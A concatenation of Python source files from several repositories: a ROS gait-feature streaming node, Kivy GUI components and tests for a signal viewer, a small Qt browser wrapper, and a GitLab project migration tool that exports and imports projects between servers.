if (learning and (count % 5 == 0)):
if (active_model==None) and (np.all(np.greater(n,MAX_SAMPLES))):
mdl=train(memory)
lock.acquire()
active_model=deepcopy(mdl)
lock.release()
CheckPoint()
elif active_model!=None:
mdl=retrain(memory)
lock.acquire()
active_model=mdl
lock.release()
CheckPoint()
count=count+1
#Wait a second
rate.sleep()
```
#### File: nodes/deletethis/eris_featTest.py
```python
import rospy
import threading
from custom_msgs.msg import Float32, String, featmsg, classmsg, regmsg, maskmsg, Float32MultiArray
from std_msgs.msg import Header, Bool, MultiArrayDimension
from eris.eris import Eris
from threading import Thread,Lock
#from time import sleep
import numpy as np
import struct
from construct import Array,Struct,Float32l,Int8ub,this
import signal
import sys
import copy
#import Exception
dataMutex=Lock()
startFlag = False
runningFlag = False
#What to read from Eris
#Set up Eris driver to retrieve only features
features=['Gait']
featuresformat=Struct(
"timestamp" / Float32l,
"len" / Int8ub,
"features" / Array(this.len,Float32l)
)
gaitFormat = Struct("Gait" / Float32l)
#if rospy.has_param('eris/port'):
# port=rospy.get_param('eris/port')
#else:
#port='/dev/ttyACM0'
port='/dev/ttyACM0'
##################### ROS MESSAGES AND PUBLISHERS ##############################
textmsg = String()
featuresmsg=Float32MultiArray()
regfeatpub = rospy.Publisher('record/RegFeats', Float32MultiArray, queue_size=3)
clasfeatpub = rospy.Publisher('record/ClassFeats', Float32MultiArray, queue_size=3)
classquerypub = rospy.Publisher('eris/ClassQuery', classmsg, queue_size=1)
gaitpub = rospy.Publisher('record/Gait', Float32, queue_size=3)
textpub = rospy.Publisher('eris/text', String, queue_size=1)
#Gait-locations to for classification
gaitLocs = np.array([5, 21.67, 38.33, 55, 71.67, 88.33])
lastGait = 0
################################################################################
#Create an eris object
streams=['Gait']
streamsformat=[gaitFormat]
e=Eris(streams,streamsformat,port)
######################## HELPER FUNCTIONS ######################################
def signal_handler(sig,frame):
print('Ctrl+c')
e.sendCommand('F_OFF')
e.sendCommand('S_OFF')
e.stop()
sys.exit(0)
signal.signal(signal.SIGINT,signal_handler)
def cleanNaN(listcontainer):
''' Remove nans from a listcontainer'''
data = np.array(listcontainer)
n=np.isnan(data)
data=data[~n];
return data
def publishFeaturesHelper(sample, publisher):
'''Publish features data'''
timestamp=sample['timestamp']
featuresmsg.data=sample['features']
featuresmsg.header=Header(stamp=t0+rospy.Duration(timestamp))
featuresmsg.layout.dim=[MultiArrayDimension()]
featuresmsg.layout.dim[0].size=sample['len']
featuresmsg.layout.dim[0].stride=1
featuresmsg.layout.dim[0].label='index'
publisher.publish(featuresmsg)
######################## THREAD FUNCTIONS ######################################
def publishFeatures(data, publisher):
dataMutex.acquire(1)
local=copy.copy(data)
dataMutex.release()
lastpacket=local[-1]
try:
packetdata=featuresformat.parse(lastpacket[0])
except Exception as ex:
print('mierda')
print(ex)
print(lastpacket)
return
#TODO publish a missing data message under eris/errors
publishFeaturesHelper(packetdata, publisher)
def publishGait(data):
global lastGait
dataMutex.acquire(1)
local=copy.copy(data)
dataMutex.release()
currGait = struct.unpack('f', local[0])[0]
gaitmsg = Float32()
gaitmsg.data = currGait
gaitmsg.header = Header(stamp = rospy.Time.now())
#check to see if we need to classify
locInd = np.argmin(abs(gaitLocs - currGait))
loc = gaitLocs[locInd]
if((lastGait < loc) & (currGait > loc) | (lastGait > gaitLocs[-1]) & (currGait > loc) & (locInd == 0)):
#print([lastGait, loc, currGait])
# if going from last to current crosses loc, or if last was near end of gc (larger than
# the latest classif location) and the current gait is greater than the nearest location
querymsg = classmsg()
querymsg.time = rospy.Time.now().to_sec() - t0.to_sec()
querymsg.maskIndex = locInd.item()
classquerypub.publish(querymsg)
gaitpub.publish(gaitmsg)
lastGait = currGait
def publishText(data):
for packet in enumerate(data):
textmsg.data = packet
textmsg.header=Header(stamp=rospy.Time.now())
textpub.publish(textmsg)
######################## CALLBACK FUNCTIONS ##############################
def command_callback(msg):
e.sendCommand(msg.data)
def reg_callback(msg):
command = "REG " + str(msg.win) + " " + str(msg.inc) + " " + str(msg.maskIndex)
e.sendCommand(command)
def class_callback(msg):
command = "F_CLASS " + str(msg.maskIndex)
print(command)
e.sendCommand(command)
def mask_callback(msg):
command = "F_MASK " + str(msg.isClassifier) + " " + str(msg.chan) + " " + str(msg.index) + " " + msg.mask
e.sendCommand(command)
def start_callback(msg):
global startFlag
startFlag = msg.data
########################### Program Main body ###########################
rospy.init_node('biomnode', anonymous=True)
#Setting up callbacks
cmdsub = rospy.Subscriber('eris/command',String,command_callback)
regsub = rospy.Subscriber('eris/RegParams', regmsg, reg_callback)
classsub = rospy.Subscriber('eris/ClassQuery', classmsg, class_callback)
masksub = rospy.Subscriber('eris/mask', maskmsg, mask_callback)
startsub = rospy.Subscriber('eris/start', Bool, start_callback)
ROSRATE=200 #Hz
rate = rospy.Rate(ROSRATE)
e.sendCommand('TPAC 1')
e.sendCommand('S_OFF')
e.sendCommand('S_TIME')
while True:
if startFlag:
#Runs setup only if start command is issued and we aren't already running
if runningFlag == False:
e.sendCommand('TPAC 1') #Text commands
e.sendCommand('F_ON') #Feature extraction enabled
e.sendCommand('S_ON') #Streaming enabled
print('Inicio')
t0=rospy.Time.now()
count = 0
runningFlag = True
try:
dataMutex.acquire(1)
d=e.read()
dataMutex.release()
except Exception as ex:
dataMutex.release()
print('Problem')
print(ex)
e.sendCommand('S_OFF')
rate.sleep()
e.sendCommand('S_ON')
rate.sleep()
continue
#Get data from teensy
if type(d) is dict:
if len(d['R'])>0:
tr = Thread(target = publishFeatures, args = ((d['R'],), regfeatpub))
tr.start()
if len(d['C'])>0:
tc = Thread(target = publishFeatures, args = ((d['C'],),clasfeatpub))
tc.start()
if len(d['D'])>0:
td = Thread(target = publishGait, args = (d['D'],))
td.start()
if len(d['T'])>0:
tt = Thread(target = publishText, args = (d['T'],))
tt.start()
#If we are running but we're not supposed to be, stop
elif runningFlag == True:
e.sendCommand('F_OFF')
e.sendCommand('S_OFF')
runningFlag = False
rate.sleep()
``` |
{
"source": "JonathanCamargo/SignalViewer",
"score": 2
} |
#### File: EpicLeg/statslayout/statslayout.py
```python
from kivy.uix.gridlayout import GridLayout
from viewer import SignalViewer
class StatsLayout(GridLayout):
def __init__(self,**kwargs):
super(StatsLayout,self).__init__(**kwargs)
```
#### File: SignalViewer/layout/filechoosing.py
```python
from kivy.uix.floatlayout import FloatLayout
from kivy.properties import ObjectProperty
from kivy.clock import Clock
class LoadDialog(FloatLayout):
#Class for generating a generic load dialog
#to use it, create an instance of LoadDialog and override the cancel and open _callback methods
filechooser=ObjectProperty(None)
load = ObjectProperty(None)
cancel = ObjectProperty(None)
path = '.'
def __init__(self,path='.',**kwargs):
super(LoadDialog,self).__init__(**kwargs)
self.path=path
Clock.schedule_once(lambda dt: self.build(),0)
def build(self):
self.filechooser.path=self.path
self.filechooser.on_submit=self.on_submit_callback
def cancel_callback(self):
print("cancel")
def on_submit_callback(self,selection,touch):
self.path=selection[0]
self.open_callback(self.path)
def _open_callback(self):
if len(self.filechooser.selection) > 0:
self.path=self.filechooser.selection[0]
self.open_callback(self.path)
def open_callback(self,path):
print(path)
class SaveDialog(FloatLayout):
#Class for generating a generic save dialog
#to use it, create an instance of saveDialog and overide the cancel and open _callback methods
save = ObjectProperty(None)
text_input = ObjectProperty(None)
cancel = ObjectProperty(None)
filechooser=ObjectProperty(None)
load = ObjectProperty(None)
cancel = ObjectProperty(None)
path = '.'
def __init__(self,path='.',**kwargs):
super(SaveDialog,self).__init__(**kwargs)
self.path=path
Clock.schedule_once(lambda dt: self.build(),0)
def build(self):
self.filechooser.path=self.path
self.filechooser.on_submit=self.on_submit_callback
def cancel_callback(self):
print("cancel")
def on_submit_callback(self,selection,touch):
self.path=selection[0]
self.save_callback(self.path)
def _save_callback(self):
if len(self.filechooser.selection) > 0:
self.path=self.filechooser.selection[0]
self.save_callback(self.path)
else:
self.save_callback(self.text_input.text)
def save_callback(self,path):
print(path)
class SelectDialog(FloatLayout):
select = ObjectProperty(None)
text_input = ObjectProperty(None)
cancel = ObjectProperty(None)
```
#### File: SignalViewer/layout/mainlayout.py
```python
from roshandlers.rosconnector import ROSConnector
from kivy.properties import ObjectProperty
from kivy.uix.widget import Widget
from kivy.uix.label import Label
from kivy.uix.button import Button
from kivy.uix.gridlayout import GridLayout
from layout.toolbar import Toolbar
from layout.erisbar import ErisBar
from kivy.uix.popup import Popup
from kivy.clock import Clock
from threading import Thread
class MainLayout(GridLayout):
#fsm=ObjectProperty(FSM) #reference to fsm object inside the main layout
toolbar=ObjectProperty(Toolbar) #reference to toolbar object inside the main layout
ros=ROSConnector()
counter=0
popup=ObjectProperty(None)
event=None
def __init__(self,**kvargs):
super(MainLayout,self).__init__(**kvargs)
Clock.schedule_once(lambda dt: self.initROS(), 2)
self.popup=None
self.counter=0
def build(self):
print("MainLayout build")
def initROS(self):
t = Thread(target=self.ros.connect)
t.start()
self.event=Clock.schedule_interval(lambda dt: self.checkROS(), 1/10)
def checkROS(self):
if self.popup==None:
self.popup = Popup(title='Connecting to ROS',
content=Label(text='Attempting connection'),
size_hint=(None, None), size=(200, 200))
self.popup.open()
if not self.ros.isOK():
self.counter=self.counter+1;
if self.counter>5:
self.popup.content=Label(text='ERROR: verify ROS')
else:
if self.popup is not None:
self.popup.dismiss()
self.event.cancel()
```
#### File: SignalViewer/layout/optionsdialog.py
```python
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.modalview import ModalView
from kivy.uix.spinner import Spinner
from kivy.properties import ObjectProperty
from kivy.clock import Clock
#Convenience editing of dictionaries
from common.dict import getsemileafs_paths, getleaf_value, setleaf_value, isleaf
from kivy.uix.popup import Popup
from kivy.logger import Logger
posible_equations=('constant','scaleOnWeightEqn', 'scaleOnSpeedEqn', 'scaleAnkleStiffnessEqn','dampingEqn', 'scaleOnWeightEqn2Up', 'scaleOnWeightEqn2Down','previousValueEqn');
parameters=dict();
# Dictionary holding the posible equations
# and their parameters, types and default values.
parameters['constant']={};
parameters['scaleOnWeightEqn']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'}
}
parameters['scaleOnWeightEqn2Up']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'},
'initial_w': {'default':0, 'type': 'float'},
'final_w': {'default':0, 'type': 'float'}
}
parameters['scaleOnWeightEqn2Down']={
'C': {'default':0,'type':'float'},
'initial_value': {'default':0,'type':'float'},
'final_value': {'default':0,'type':'float'},
'value': {'default':0, 'type': 'float'},
'initial_w': {'default':0, 'type': 'float'},
'final_w': {'default':0, 'type': 'float'}
}
parameters['scaleOnSpeedEqn'] = {
'A': {'default':0.141, 'type':'float'},
'B': {'default':0.264, 'type':'float'}
}
parameters['scaleAnkleStiffnessEqn'] = {
}
parameters['dampingEqn'] = {
'P': {'default': 1, 'type': 'float'}
}
parameters['previousValueEqn'] = {
'param_name': {'default': '', 'type': 'string'}
}
class OptionsDialog(ModalView):
# A class for creating a modal view with the options for a parameter
# options contain a dictionary with the equation and all its posible parameters
semileaf_dict=None
title_lbl=ObjectProperty(Label)
paramsholder=ObjectProperty(BoxLayout)
def __init__(self,semileaf_path=None,semileaf_dict=None,**kwargs):
super(OptionsDialog,self).__init__(**kwargs)
self.semileaf_dict=semileaf_dict
self.semileaf_path=semileaf_path
Clock.schedule_once(lambda dt: self.build(), 0)
def build(self):
print("Options dialog build")
self.populate()
def populate(self):
#Construct the options menu from a ROSParams object
self.clear() # Start from fresh
if self.semileaf_dict is None:
return
#Fill the label
self.title_lbl.text="Options for "+"/".join(self.semileaf_path)
semileaf=self.semileaf_dict
#Create labels+textboxes
options=semileaf['options']
equation=options['equation']
boxLayout=BoxLayout(orientation='horizontal')
boxLayout.add_widget(Label(text='equation:'))
spinner=Spinner(text=equation,values=posible_equations)
spinner.bind(text=self.spinner_callback)
boxLayout.add_widget(spinner)
self.paramsholder.add_widget(boxLayout)
#Add parameter
for parameter in options.keys():
if not parameter=='equation':
boxLayout=BoxLayout(orientation='horizontal')
boxLayout.add_widget(Label(text=parameter+':'))
newTextInput=TextInput(text=str(options[parameter]))
isfloat=False
if not equation in parameters:
#ERROR this equation is not supported default parameters to float
Logger.info('Equation not supported')
isfloat=True
else:
if parameters[equation][parameter]['type']=='float':
isfloat=True
newTextInput.bind(text=self.on_text_callback_generator(parameter,isfloat))
boxLayout.add_widget(newTextInput)
self.paramsholder.add_widget(boxLayout)
def spinner_callback(self,spinner,text):
print("selected eq:"+text)
if text in posible_equations:
# Change dictionary values for the defaults corresponding to
# this equation's parameters
new_options=dict()
new_options['equation']=text
eq_parameters=parameters[text]
if type(eq_parameters) is dict:
for parameter in eq_parameters.keys():
param=eq_parameters[parameter]
new_options[parameter]=param['default']
print("\t%s"%new_options)
self.semileaf_dict['options']=new_options
self.populate()
def on_text_callback_generator(self,key,isfloat):
#This function helps to create a callback function for each text input
# modifying the appropiate key of the dictionary
return lambda instance,value : self.change_paramvalue(key,value,isfloat)
def change_paramvalue(self,param_key,value,isfloat=True):
#Change the value for a key
param_dict=self.semileaf_dict
options=param_dict['options']
#value always comes as a string
if isfloat:
try:
value=float(value)
except:
pass
options[param_key]=value
def clear(self):
self.paramsholder.clear_widgets()
```
#### File: SignalViewer/roshandlers/params.py
```python
import rospy
from rospy import ROSException
import warnings
#from common.dict import getleafs_paths
#API functions for setting and getting parameters
#rospy.set_param(param_name,param_value)
#rospy.get_param(param_name, default=<rospy.client._Unspecified object>)
#For multiple parameters
#{'x':1,'y':2,'sub':{'z':3}}
#will set param_name/x=1, param_name/y=2, and param_name/sub/z=3. Furthermore, it will replace all existing parameters in the param_name namespace with the parameters in param_value. You must set parameters individually if you wish to perform a union update.
# Class for managing parameters from and to the rosparam server
# an instance reads a param name (it could be not a leaf parameter i.e. dictionary of parameters)
# for example, you can create the object:
# param1=ROSParams('/EarlyStance/Knee/')
# Then, the param1 object has a dictionary for all the parameters under '/EarlyStance/Knee'
# If there are no parameters in the param server the dictionary is empty.
# You can modify the dictionary to change the parameter values and when done you can upload the parameters to the parameter server
class ROSParam(object):
def __init__(self,name):
self.name=name
self.download()
def set(self, param_name,param_value):
# set a parameter directly in the parameter server
return rospy.set_param(param_name,param_value)
def get(self, name):
# get a parameter directly from the parameter server
try:
return rospy.get_param(name)
except ROSException:
warnings.warn("ROSException")
except KeyError:
warnings.warn("%s: parameter does not exist in rosmaster"%name)
return []
def upload(self):
# upload the parameters stored in this instance to rosmaster
return rospy.set_param(self.name,self.dictionary)
def download(self):
#download the parameters from rosmaster to the dictionary in this instance
try:
self.dictionary=rospy.get_param(self.name)
except ROSException:
warnings.warn("ROSException")
except KeyError:
warnings.warn("%s: parameter does not exist in rosmaster"%self.name)
self.dictionary=[]
```
#### File: SignalViewer/signalslayout/autoselector.py
```python
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
def WidgetSelect(topic_type):
#returns the default plot type for a certain topic type
selections={
'custom_msgs/FsmState' : TextWidget
}
return selections.get(topic_type,PlotWidget)
def AutoSelect(topic_name):
#returns whether or not a topic name should be selected automatically in the
selections={
'/fsm/State' : False,
'/ankle/joint_state' : True,
'/knee/joint_state' : True,
'/loadcell/wrench' : True
}
return selections.get(topic_name,False)
```
#### File: SignalViewer/signalslayout/signaldisplay.py
```python
from kivy.uix.gridlayout import GridLayout
from kivy.uix.boxlayout import BoxLayout
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.uix.checkbox import CheckBox
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.button import Button
from kivy.uix.widget import Widget
from threading import Thread
from customwidgets.text import TextWidget
from customwidgets.plot import PlotWidget
from subscribers.subscriber import Subscriber
class SignalDisplay(GridLayout):
plots_dict={} #Dictionary of current plots in the display
topics_dict={} #Local access to the dictionary of all available topics
viewer_ref=ObjectProperty(None)
display_ref=ObjectProperty(None)
def __init__(self,**kwargs):
super(SignalDisplay,self).__init__(**kwargs)
def setreferences(self,viewer,selector):
self.viewer_ref=viewer
self.selector_ref=selector
def build(self,topics_dict=None):
if topics_dict is not None:
self.topics_dict=topics_dict
else:
self.topics_dict=self.viewer_ref.topics_dict
def add(self,topic_name,widget_class=TextWidget):
#add a widget for the topic
subs=self.topics_dict[topic_name]['subs']
#Get subscriber channels:
channels=subs.getChannels()
newplot=widget_class(channels=channels,title=topic_name)
newGridElement=GridLayout(cols=1,rows=1)
newGridElement.add_widget(newplot)
self.add_widget(newGridElement)
self.plots_dict[topic_name]=newplot
def remove(self,topic_name):
#remove the plot for the corresponding topic
plot=self.plots_dict[topic_name]
parentContainer=plot.parent
parentContainer.parent.remove_widget(parentContainer)
self.plots_dict.pop(topic_name)
def update(self):
for key in self.plots_dict:
sub=self.topics_dict[key]['subs']
plot=self.plots_dict[key]
try:
data=sub.getQueue()
except:
print('Error')
#print(data)
if data is not []:
plot.update(data)
pass
```
#### File: tests/common/dictionary_leafs.py
```python
import sys
sys.path.append('../..')
from common.dict import getleafs_paths , getleaf_value, setleaf_value
def main(**args):
dictionary={'ankle': {'k': 200, 'b': 15, 'theta_eq': 0}, 'knee': {'k': 172, 'b': 0, 'theta_eq': 0}}
print("Dictionary: %s"%dictionary)
a=getleafs_paths(dictionary)
print("Leafs:%s"%a)
leaf_i=1
print("Value for leaf %s : %s"%(a[leaf_i],getleaf_value(dictionary,a[leaf_i])))
setleaf_value(dictionary,a[leaf_i],18.5)
print("New Dictionary: %s"%dictionary)
if __name__=="__main__":
main()
```
#### File: tests/filter_bar/filter_bar.py
```python
import sys
sys.path.append('..')
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.textinput import TextInput
class InputLayout(BoxLayout):
#Widget for showing the value of a float variable
input = ObjectProperty(TextInput)
def __init__(self, **kvargs):
super(InputLayout, self).__init__(**kvargs)
Clock.schedule_once(lambda dt: self.build(), 0)
def build(self):
print("build")
self.input.bind(text=self.parent.on_input_callback)
def update(self, dt):
text = str(self.subs1.data)
self.xlabel.setText(text)
class guiLayout(BoxLayout):
#Root widget or layout for the GUI
floatwidget = ObjectProperty(None)
def __init__(self, **kvargs):
super(guiLayout, self).__init__(orientation='vertical')
self.all_names = [
'name/othername/aname', 'name/othername/aname',
'name/othername/bname', 'name/othername/cname',
'name/thisothername/aname', 'nameZ/othername/aname',
'nameZ/othername/aname'
]
Clock.schedule_once(lambda dt: self.build(self.all_names), 0)
def build(self, names_list):
self.clear_labels()
for i, name in enumerate(names_list):
#create labels
print(name)
self.grid.add_widget(Label(text=name))
def clear_labels(self):
#Delete all labels in the widget
self.grid.clear_widgets()
def on_input_callback(self, instance, value):
print(value)
# TO DO #
# This is where the filter does the work#
new_names = filter(lambda x: value in x, self.all_names)
self.build(new_names)
# TO DO #
# use the filter output to generate a new (filtered) names_list
# -> name_list=something
# Draw the gui again
# self.build(names_list)
class filter_barApp(App):
gui = ObjectProperty(BoxLayout)
def build(self):
self.gui = guiLayout()
return self.gui
def on_start(self):
pass
def on_pause(self):
#To do: save your work here resume is not guaranteed
pass
def on_resume(self):
#To do: app is back alive
pass
if __name__ == '__main__':
filter_barApp().run()
```
#### File: SignalViewer/tests/GUI_plot.py
```python
import sys
sys.path.append('..')
import rospy
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.uix.popup import Popup
from kivy.uix.label import Label
from kivy.properties import ObjectProperty, BooleanProperty, StringProperty
from rospy import ROSInitException
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from subscribers.std_msgs_sub import Float32Subscriber
import threading
class Xlabel(Widget):
value=StringProperty("")
def setText(self,text):
self.value=text;
def ROSConnect():
ros_ok=False
try:
print("Connecting to rosmaster")
rospy.init_node('listener', anonymous=True)
ros_ok=True
except ROSInitException:
print("Could not initialize ros node")
ros_ok=False
finally:
pass
return ros_ok
class ROSWidget(Widget):
#ROS connection
ros_ok=BooleanProperty(False)
error_popup = ObjectProperty(Popup)
def a_task(self):
for i in range(0,100000):
print("hola %s" % i)
def __init__(self,**kvargs):
super(ROSWidget,self).__init__(**kvargs)
#Do this in a new thread
ROSConnect()
class FloatWidget(Widget):
#Widget for showing the value of a float variable
xlabel = ObjectProperty(None)
subs1 = ObjectProperty(None)
def __init__(self,**kvargs):
super(FloatWidget,self).__init__(**kvargs)
self.initialize()
def initialize(self):
self.subscribeAll()
Clock.schedule_interval(self.update, 1.0/60.0)
def subscribeAll(self):
self.subs1=Float32Subscriber("/x")
def update(self, dt):
text=str(self.subs1.data)
self.xlabel.setText(text)
class guiLayout(BoxLayout):
#Root widget or layout for the GUI
floatwidget=ObjectProperty(None)
def __init__(self,**kvargs):
super(guiLayout,self).__init__(orientation='vertical')
class guiApp(App):
gui=ObjectProperty(BoxLayout)
def build(self):
self.gui = guiLayout()
return self.gui
def on_start(self):
pass
def on_pause(self):
#To do: save your work here resume is not guaranteed
pass
def on_resume(self):
#To do: app is back alive
pass
if __name__ == '__main__':
guiApp().run()
```
#### File: tests/ros_interaction/rosparam_test.py
```python
import sys
sys.path.append('../..')
import rospy
import warnings
import signal, sys, time
from roshandlers.params import ROSParam
def signal_handler(signal, frame):
print('You pressed Ctrl+C!')
sys.exit(0)
def main():
print "START TEST"
signal.signal(signal.SIGINT, signal_handler)
print('Press Ctrl+C to end')
#Launch ros node
rospy.init_node('listener', anonymous=True)
param1=ROSParam('/test/param1')
if param1.value is []:
print("parameter is not set in server")
else:
print("parameter: %s , value: %s"%(param1.name,param1.value))
# Modify the value of the parameter
param1.value=5;
param1.upload()
#At this point you can check with rosparam list / rosparam get in terminal
while True:
# While this infinite loop is running you can open a terminal and modify
# the value in the param server (e.g. rosparam set /test/param1 10.4)
# the value should refresh accordingly in the print parameter line
print("Hi!")
param1.download()
if param1.value is []:
print("parameter is not set in server")
else:
print("parameter: %s , value: %s"%(param1.name,param1.value))
time.sleep(5)
if __name__ == "__main__":
main()
```
#### File: tests/visual_elements/hello_world.py
```python
from kivy.app import App
from kivy.uix.label import Label
from kivy.logger import Logger
import warnings
class TestApp(App):
def build(self):
warnings.warn("this is a warning")
Logger.warning("this is a warning in kivy")
Logger.info('title: This is a info message.')
Logger.debug('title: This is a debug message.')
return Label(text="hi there")
TestApp().run()
``` |
{
"source": "jonathancardoso/dev-tests",
"score": 2
} |
#### File: dev-tests/test002/browser.py
```python
import sys
from PyQt4 import QtGui, QtCore
from PySide.QtGui import QApplication
from PySide.QtCore import QUrl
from PySide.QtWebKit import QWebView
class SystemTrayIcon(QtGui.QSystemTrayIcon):
def __init__(self, icon, parent=None):
QtGui.QSystemTrayIcon.__init__(self, icon, parent)
menu = QtGui.QMenu(parent)
exitAction = menu.addAction("Exit")
self.setContextMenu(menu)
QtCore.QObject.connect(exitAction,QtCore.SIGNAL('triggered()'), self.exit)
def exit(self):
QtCore.QCoreApplication.exit()
def main():
app = QtGui.QApplication(sys.argv)
browser = QWebView()
browser.setWindowTitle('CreativeDrive Brazil')
browser.setUrl(QUrl('http://127.0.0.1:5000'))
browser.showMaximized()
w = QtGui.QWidget()
trayIcon = SystemTrayIcon(QtGui.QIcon("static/images/ico.png"), w)
trayIcon.show()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
``` |
{
"source": "jonathancarroll/gitlab-migrate",
"score": 3
} |
#### File: gitlab-migrate/gitlab_migrate/config.py
```python
import yaml
def load(config_file):
with open(config_file) as f:
config = yaml.load(f, Loader=yaml.FullLoader)
return Config(**config)
class Config(object):
__slots__ = ['servers', 'migrate']
def __init__(self, servers, migrate):
self.servers = {name: Server(config) for name, config in servers.items()}
self.migrate = Migrate(**migrate)
class Server(object):
__slots__ = ['url', 'auth_token', 'api_version', 'group', 'ssl_verify']
def __init__(self, server):
self.url = server['url']
self.auth_token = server['auth_token']
self.api_version = server['api_version'] if 'api_version' in server else 4
self.group = server['group'] if 'group' in server else None
self.ssl_verify = server['ssl_verify'] if 'ssl_verify' in server else True
class Migrate(object):
__slots__ = ['groups', 'user']
def __init__(self, groups=None, user=None):
self.groups = groups if groups is not None else {}
self.user = user
```
#### File: gitlab-migrate/gitlab_migrate/connection.py
```python
import gitlab
import os
import time
def connect(gitlab_instance, gitlab_token, api_version=4, ssl_verify=True):
GL_CONN = gitlab.Gitlab(
gitlab_instance, private_token=<PASSWORD>_token, api_version=api_version, ssl_verify=ssl_verify
)
GL_CONN.auth()
return GL_CONN
def _projects_from_group(connection, group, statistics=True):
gl = connection
projects = []
results = gl.groups.list(search=group, statistics=statistics, include_subgroups=True)
if len(results) > 1:
groups = [(g.id, g.name) for g in results]
msg = 'Found more than one group matching "{}" [{}] - trying to resolve'.format(group, groups)
print(msg)
# mimick exact search
exact_match = None
for g in results:
if g.name == group:
exact_match = [g]
break
results = exact_match
if not results:
msg = 'Unable to find group matching "{}" - aborting'.format(group)
raise NameError(msg)
gl_group = results[0]
# this never gives statistics
projects_tmp = gl_group.projects.list(all=True, include_subgroups=True)
# for each project, download full info
for p in projects_tmp:
projects.append(gl.projects.get(p.id, statistics=statistics))
return projects
def _project_by_name(connection, name, statistics=True):
gl = connection
results = gl.projects.list(search=name, statistics=statistics)
if len(results) > 1:
print('Found more than one group matching "{}" - aborting'.format(name))
return 1
return results[0]
def projects(connection, names=None, groups=None, statistics=True):
gl = connection
results = []
if groups is not None and not isinstance(groups, (list, tuple)):
groups = [groups]
if groups:
for g in groups:
results += _projects_from_group(gl, g, statistics)
if names:
results = list(filter(lambda x: x.name in names, results))
else:
if names:
results = [_project_by_name(gl, name, statistics) for name in names]
else:
results = gl.projects.list(all=True, statistics=statistics)
return results
def user_projects(connection, names=None, statistics=True):
current_user = connection.users.get(connection.user.id)
projects_tmp = current_user.projects.list(statistics=statistics)
projects = []
for p in projects_tmp:
projects.append(connection.projects.get(p.id, statistics=statistics))
if names:
projects = list(filter(lambda x: x.name in names, projects))
return projects
def export_project(project):
print('Starting export process for project', project.name)
export_file = '/tmp/{}.tgz'.format(project.name)
if os.path.exists(export_file):
print('Export file for project {} already exists: {}'.format(project.name, export_file))
return export_file
export = project.exports.create({})
export.refresh()
while export.export_status != 'finished':
time.sleep(1)
export.refresh()
with open(export_file, 'wb') as f:
export.download(streamed=True, action=f.write)
return export_file
def find_group(connection, group, statistics=False):
if '/' in group:
tokens = group.split('/')
current_group = None
base_group = None
for search_for in tokens:
if current_group is None:
current_group = connection.groups.list(
search=search_for, statistics=statistics, include_subgroups=True
)[0]
base_group = current_group
else:
current_group = base_group.subgroups.list(
search=search_for, statistics=statistics, include_subgroups=True
)[0]
base_group = connection.groups.get(current_group.id)
# full API access only through groups.get
current_group = connection.groups.get(current_group.id)
return current_group
else:
current_group = connection.groups.list(search=group, statistics=statistics)[0]
return current_group
def import_project(connection, project, destination):
# print(dir(destination))
# return
export_file = export_project(project)
print('Importing', project.name, 'to', destination.name)
# new_project = connection.projects.create({'name':project.name, 'namespace_id': destination.id})
try:
with open(export_file, 'rb') as f:
output = None
if type(destination).__name__ == 'User':
output = connection.projects.import_project(f, path=project.path, override=True)
else:
output = connection.projects.import_project(
f, path=project.path, namespace=destination.id, overwrite=True,
)
print(' >>>> Import in progress')
project_import = connection.projects.get(output['id'], lazy=True).imports.get()
while project_import.import_status not in ['finished', 'failed']:
print(project_import.import_status)
time.sleep(10)
project_import.refresh()
if project_import.import_status == 'failed':
# TODO: remove failed project
print('Unable to import project:', project_import.import_error)
except gitlab.exceptions.GitlabHttpError as e:
print(' >>>> Unable to import project', project.name, ':', e)
return False
return True
```
#### File: gitlab-migrate/gitlab_migrate/migrate.py
```python
import click
import sys
from . import __version__
from . import config as cfg
from . import connection as glc
def print_version(plain):
if plain:
click.echo(__version__)
else:
click.echo("gitlab-migrate version: {}".format(__version__))
def migration_instructions(conn_src, conn_dst, migrate):
instructions = []
user_projects = []
groups = migrate.groups
user = migrate.user
for group, content in groups.items():
names = None
if content['projects'] != '--all--':
names = content['projects']
projects = glc.projects(conn_src, names=names, groups=[group], statistics=False)
search_for = content['destination']
destination = glc.find_group(conn_dst, search_for)
if not destination:
print('Unabled to find destination "{}" - aborting'.format(search_for))
return instructions, user_projects
for project in projects:
instructions.append((project, destination))
if user:
names = None
if user['projects'] != '--all--':
names = user['projects']
user_projects = glc.user_projects(conn_src, names=names, statistics=False)
return instructions, user_projects
@click.command(help=__doc__)
@click.argument('config_file', type=click.Path(exists=True), required=False)
@click.option('--version', is_flag=True)
@click.option('--plain', is_flag=True)
@click.option('--noop', is_flag=True)
def cli(config_file, version, plain, noop):
if version:
print_version(plain)
return 0
config = cfg.load(config_file)
src_server = config.servers['source']
dst_server = config.servers['destination']
gl_src = glc.connect(src_server.url, src_server.auth_token, ssl_verify=src_server.ssl_verify)
gl_dst = glc.connect(dst_server.url, dst_server.auth_token, ssl_verify=src_server.ssl_verify)
group_instructions, user_instructions = migration_instructions(gl_src, gl_dst, config.migrate)
# print(group_instructions, user_instructions)
for project, destination in group_instructions:
print(' >> Going to migrate project {} to {}/{}/{}'.format(
project.name, dst_server.url, destination.name, project.name
)
)
if not noop:
print(' >>>> Importing project', project.name)
glc.import_project(gl_dst, project, destination)
dst_user = gl_dst.users.get(gl_dst.user.id)
for project in user_instructions:
print(' >> Going to migrate project {} to {}/{}'.format(
project.name, dst_server.url, gl_dst.user.username
)
)
if not noop:
print(' >>>> Importing project', project.name)
glc.import_project(gl_dst, project, dst_user)
# print(group_instructions, user_instructions)
